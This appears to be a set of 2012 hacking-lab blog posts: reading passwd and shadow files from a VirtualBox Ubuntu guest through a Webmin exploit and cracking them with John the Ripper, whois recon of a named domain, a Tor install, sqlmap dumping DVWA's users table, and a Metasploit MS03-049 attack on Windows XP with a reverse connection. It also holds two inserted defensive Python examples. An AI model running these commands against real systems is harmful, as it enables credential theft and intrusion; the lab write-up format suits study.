Wednesday, September 26, 2012

Privilege Escalation guest Ubuntu in VirtualBox

I will try to obtain an ID and password from an Ubuntu guest
in VirtualBox using Nessus and Exploit-DB,
with VirtualBox running on Linux.





Follow the steps below.
The first step is information gathering.
Here I use Terminator:
# ping 192.168.56.102 => the host responds
# nmap 192.168.56.102 => IP address

To find out the ports and versions, proceed as below:
# nmap -sV 192.168.56.102




Now we continue with Nessus:
Vulnerability Assessment > Nessus start
Then go to the browser and log in => Next
Scans > Add, then fill in the input:


When the status is Completed, click Browse.


Now that we have the results, continue with the appropriate port:
scroll to port 10000
=> Next


Take a look at Severity and select high, medium or low:



Here you can see the Synopsis, Description, Solution and See Also for the finding.






To find out whether this is true, we can check with Exploit-DB in Terminator, as follows:
# ./searchsploit webmin





Here we learn that in 2017.pl the target value means:
0 => HTTP
1 => HTTPS




Usage: platforms/multiple/remote/2017.pl (url => enter the IP) (port => 10000,
as we found) (filename => passwd) (target => 0 = HTTP) => Next




Enter the same command, only with the filename replaced by
/shadow 0



Copy the contents of the files, create a new folder, and combine them into one =>




Now in Terminator: Privilege Escalation > Offline Attacks > John the Ripper
# ./john /root/expo
Wait until it is finished...
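
Once passwd and shadow have leaked, the cost of the offline attack depends on the hash scheme of each entry. The following added example (not code from this post; the sample entries, the `classify` and `audit` names and the 5000-round floor are assumptions made here) audits shadow-format lines and reports accounts whose hashes are cheap to attack or whose password is empty:

```python
# Added example: flag shadow entries that are cheap to attack offline.
SCHEMES = {  # crypt(3) "$id$" prefix -> (scheme name, verdict)
    "1": ("md5crypt", "weak"),
    "2a": ("bcrypt", "ok"), "2b": ("bcrypt", "ok"), "2y": ("bcrypt", "ok"),
    "5": ("sha256crypt", "ok"),
    "6": ("sha512crypt", "ok"),
    "y": ("yescrypt", "ok"),
}
MIN_ROUNDS = 5000  # assumption: the sha-crypt default is used as the floor

def classify(hash_field):
    """Return (scheme, verdict) for the second field of a shadow entry."""
    if hash_field == "":
        return ("none", "empty password")
    if hash_field[0] in "!*":
        return ("locked", "no password login")
    if not hash_field.startswith("$"):
        return ("descrypt", "weak")  # no "$id$" prefix: traditional DES crypt
    parts = hash_field.split("$")
    ident = parts[1]
    name, verdict = SCHEMES.get(ident, ("unknown", "review"))
    if ident in ("5", "6") and len(parts) > 2 and parts[2].startswith("rounds="):
        if int(parts[2][len("rounds="):]) < MIN_ROUNDS:
            verdict = "weak (low rounds)"
    return (name, verdict)

def audit(shadow_text):
    """Return [(user, scheme, verdict)] for entries that need attention."""
    findings = []
    for line in shadow_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2 or fields[0].startswith("#"):
            continue
        scheme, verdict = classify(fields[1])
        if verdict not in ("ok", "no password login"):
            findings.append((fields[0], scheme, verdict))
    return findings

# Constructed sample entries; the salt and hash strings are placeholders.
SAMPLE = """\
root:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASHVALUE:15600:0:99999:7:::
daemon:*:15600:0:99999:7:::
olduser:$1$CONSTRUCT$CONSTRUCTEDHASHVALUE:15600:0:99999:7:::
legacy:abCONSTRUCTED:15600:0:99999:7:::
guest::15600:0:99999:7:::
svc:$6$rounds=1000$CONSTRUCTEDSALT$CONSTRUCTEDHASHVALUE:15600:0:99999:7:::
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```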







Thursday, September 20, 2012

Information Gathering is2c-dojo.com

Now I will look for information on is2c-dojo.com.
Here I am going to look for the information with both active and passive methods.

Searching Google:


A picture of the is2c-dojo.com website:



#whois is2c-dojo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: IS2C-DOJO.COM
   Registrar: CV. JOGJACAMP
   Whois Server: whois.resellercamp.com
   Referral URL: http://www.resellercamp.com
   Name Server: IVAN.NS.CLOUDFLARE.COM
   Name Server: RITA.NS.CLOUDFLARE.COM
   Status: clientTransferProhibited
   Updated Date: 01-jun-2012
   Creation Date: 14-jan-2012
   Expiration Date: 14-jan-2013

Through the terminal:









Tuesday, September 18, 2012

Install TOR BackTrack 5




All right, now we begin by downloading Tor here:

https://www.torproject.org/download/download-easy.html.en







When the download is complete, save it to Home/Desktop. Extract the file; see the terminal:
# ls
# tar -xvzf tor-browser-gnu-linux-i686-2.2.39-1-dev-en-US.tar.gz





If it looks like the image above, continue in the terminal:
# cd tor-browser_en-US/
# kwrite start-tor-browser
It will look like the picture below:


Change the script as shown in the picture,
then save.



When finished, run it with the command:

# ./start-tor-browser


If it comes out like in the pictures, wait for the upload to complete.
When the upload is complete, it looks like the pictures below =>


Monday, September 17, 2012

Exploit DVWA File SQL Injection

Let's go straight to the discussion.
Here we use these tools: Mantra, sqlmap, Burp Suite.
Do the commands as below:
First, from the BackTrack menu, activate Services > mysql start > apache start,
one after the other. Only then are we ready to go.
Activate > Mantra


The browser then looks like this:

Go to localhost/dvwa and log in with ID: Admin Password: Password
After logging in, go to SQL Injection as below:




Enter a single quote (') and press Enter so that
an error appears like below:




Activate FoxyProxy.
To see the cookies, look right away at Burp Suite;
see below:




Once this has happened as above, our next step is to use sqlmap:
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" --dbs







Then specify your choice; for example, I chose 2. Enter =>

Then specify your choice; for example, I chose [*] dvwa
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa --tables


Then specify your choice; for example, I chose 2. Enter => once entered, we know the database info like below:



Afterwards we continue by selecting the users table, as below:
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users -C user


After that we keep going by selecting the user:
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users --columns


Now that we have learned the table, its columns and their types,
select one of the 6 fields
and continue with the dump like below:
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users --dump







Now just wait for the result.
It looks like this:
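
The single-quote error in the SQL injection step above appears because the id value is pasted into the SQL text itself. As an added example (not from this post and not DVWA's source; the table, rows and function names are constructed, with SQLite standing in for MySQL so it runs offline), the same lookup written with string building, with a bound parameter, and with input validation on top:

```python
import sqlite3

def make_db():
    """Constructed in-memory table standing in for a users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("1", "Alice", "Example"), ("2", "Bob", "Example")])
    return db

def lookup_concatenated(db, user_id):
    # Vulnerable form: the input becomes part of the SQL text, so a quote
    # in it ends the string literal and changes how the statement parses.
    query = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return db.execute(query).fetchall()

def lookup_parameterized(db, user_id):
    # Hardened form: the SQL text is fixed and the input is bound as data.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    # Defence in depth: accept only what an id can look like, then bind it.
    if not (user_id.isascii() and user_id.isdigit() and len(user_id) <= 9):
        raise ValueError("id must be a short decimal number")
    return lookup_parameterized(db, user_id)

def probe(lookup, db, value):
    """Run one lookup and summarise the outcome for comparison."""
    try:
        return ("rows", len(lookup(db, value)))
    except sqlite3.Error as exc:
        return ("sql error", type(exc).__name__)
    except ValueError:
        return ("rejected", None)

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "'"):
        for fn in (lookup_concatenated, lookup_parameterized, lookup_validated):
            print(repr(value), fn.__name__, probe(fn, db, value))
```

A database error returned to the browser, as in the step above, is also a signal worth alerting on in application logs.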





Sunday, September 16, 2012

Exploiting SMB in Windows XP using Metasploit





If you already know the IP address, now we just enter the IP address. The steps are as follows:



Now that we have learned that 445/tcp is open,
we move on =>
# msfconsole
Wait a while; it may take a little long.
Once it is open, we now pick the exploit to use
=>



We search with:
> search netapi
Now that we know the exploits for Windows, we
pick the right one:
> use exploit/windows/smb/ms03_049_netapi




To see the options:
> show options


> show targets
Here we see the target operating systems.

> show payloads
This is for when we want to see the payloads for the exploit.

> search smb



Now we look again at:
> show options





Now we see the configuration again.
Set it with the following:


> set RHOST 192.168.56.101 (192.168.56.101 => target IP)
> set LHOST 192.168.56.1 (192.168.56.1 => my IP)
> set LPORT 4444 => port on BackTrack


> exploit